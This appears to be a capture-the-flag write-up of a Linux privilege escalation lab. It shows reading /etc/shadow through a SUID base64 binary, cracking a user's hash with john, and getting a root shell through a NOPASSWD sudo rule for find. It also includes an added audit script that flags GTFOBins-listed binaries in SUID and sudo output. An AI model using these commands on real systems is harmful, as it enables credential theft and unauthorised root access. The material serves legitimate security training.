Linux Privilege Escalation

Task 12 | Capstone Challenge

This challenge tests whether you picked up the skills and tools practised in the earlier tasks. You are given a low-privilege user and asked only to retrieve the contents of flag1.txt and flag2.txt.

The user 'leonard' that you start out with cannot do much at all. Running find / -type f -perm -04000 -ls 2>/dev/null quickly showed that the base64 binary has the SUID bit set, so it executes with its owner's (root's) privileges and can read files that leonard cannot.

I ran base64 /etc/shadow | base64 --decode, which pushes the shadow file through the SUID copy of base64 (reading it as root) and decodes it back as the normal user, and found the password hash of 'missy'. I wanted to see whether any other user had more privilege-escalation options.

After cracking her hash with john I logged in as her and found this:

[missy@ip-10-10-242-206 ~]$ sudo -l
Matching Defaults entries for missy on ip-10-10-242-206:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
    USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User missy may run the following commands on ip-10-10-242-206:
    (ALL) NOPASSWD: /usr/bin/find

She is allowed to run /usr/bin/find as root without a password (NOPASSWD). I remembered from an earlier challenge that 'find' is listed on https://gtfobins.github.io/gtfobins with techniques to escalate privileges: find's -exec runs an arbitrary command, and under sudo that command inherits find's root privileges, so a sudo rule for find is effectively a sudo rule for everything.
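The two enumeration steps that drove this box (listing SUID binaries and reading sudo -l) are easy to turn into a repeatable check. The script below is an added example and is not part of the original write-up or the room: it parses find -perm -04000 output and sudo -l output and reports entries whose binary is on a small hand-written watch list of programs GTFOBins documents as escapes. The watch list is an assumption for the example (extend it as needed), and the sample inputs embedded at the bottom are constructed, not captured from a real host.

```sh
#!/bin/sh
# Added example (not from the original write-up): audit helpers for the two
# enumeration steps above.
#   flag_suid_binaries - reads SUID paths (one per line) on stdin
#   flag_sudo_commands - reads `sudo -l` output on stdin
# Both print the entries whose binary is on GTFO_WATCHLIST, a hand-maintained
# subset of binaries GTFOBins lists as shell or file-read escapes when run as
# root. The list is an assumption for this example.

GTFO_WATCHLIST="base64 find vim vi nano less more awk python python3 perl bash sh env cp mv tar zip"

in_watchlist() {
    # $1 = basename of a binary; succeeds when it is on the watch list
    for w in $GTFO_WATCHLIST; do
        [ "$1" = "$w" ] && return 0
    done
    return 1
}

flag_suid_binaries() {
    # Input: output of `find / -type f -perm -04000 2>/dev/null` (paths only).
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if in_watchlist "${path##*/}"; then
            printf '%s\n' "$path"
        fi
    done
}

flag_sudo_commands() {
    # Input: `sudo -l` output. Only rule lines of the form
    #     (runas) [NOPASSWD:] /path/cmd [args], /path/cmd2 ...
    # are inspected; the "Matching Defaults" block has no parentheses and is
    # skipped. A rule of "ALL" is always reported: it permits any command.
    while IFS= read -r line; do
        case "$line" in
            *\(*\)*) ;;        # contains a runas spec, so it is a rule line
            *) continue ;;
        esac
        tag=""
        case "$line" in *NOPASSWD:*) tag=" [NOPASSWD]" ;; esac
        rest=${line#*\)}                                    # drop "(runas)"
        # Drop option tags such as NOPASSWD: or SETENV: before the command list.
        rest=$(printf '%s\n' "$rest" | sed 's/[A-Z][A-Z]*:[[:space:]]*//g')
        # Commands are comma separated; the first word of each is the binary.
        printf '%s\n' "$rest" | tr ',' '\n' | while read -r bin args; do
            [ -n "$bin" ] || continue
            if [ "$bin" = ALL ] || in_watchlist "${bin##*/}"; then
                printf '%s%s\n' "$bin" "$tag"
            fi
        done
    done
}

# Constructed sample inputs (not captured from a real host).
SUID_SAMPLE='/usr/bin/passwd
/usr/bin/base64
/usr/bin/sudo
/usr/bin/find'

SUDO_L_SAMPLE='Matching Defaults entries for missy on host:
    env_reset, secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User missy may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/vim, /bin/cp -r /tmp
    (ALL : ALL) ALL'

audit_suid_sample() { printf '%s\n' "$SUID_SAMPLE" | flag_suid_binaries; }
audit_sudo_sample() { printf '%s\n' "$SUDO_L_SAMPLE" | flag_sudo_commands; }

echo "SUID binaries worth checking on GTFOBins:"
audit_suid_sample
echo "sudo rules worth checking on GTFOBins:"
audit_sudo_sample
```

On a real host you would pipe live output into the functions, for example find / -type f -perm -04000 2>/dev/null | flag_suid_binaries and sudo -l 2>/dev/null | flag_sudo_commands. The parser deliberately only looks at rule lines containing a "(runas)" specification, so the long Defaults block seen in the sudo -l output above is ignored, and it keeps the NOPASSWD marker because a rule that prompts for a password is much less useful when you only hold a cracked hash.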

Running sudo find . -exec /bin/sh \; -quit gave me a root shell. The escaped \; terminates the -exec command so the shell itself does not see it, and -quit stops find after the first match, so the shell is spawned exactly once instead of once per file.

[missy@ip-10-10-242-206 ~]$ sudo find . -exec /bin/sh \; -quit
sh-4.2# whoami
root
sh-4.2# 

From here we can easily locate flag1.txt and flag2.txt with the same binary:

sh-4.2# find / -type f -name "flag1.txt"
/home/missy/Documents/flag1.txt
sh-4.2# find / -type f -name "flag2.txt"
/home/rootflag/flag2.txt
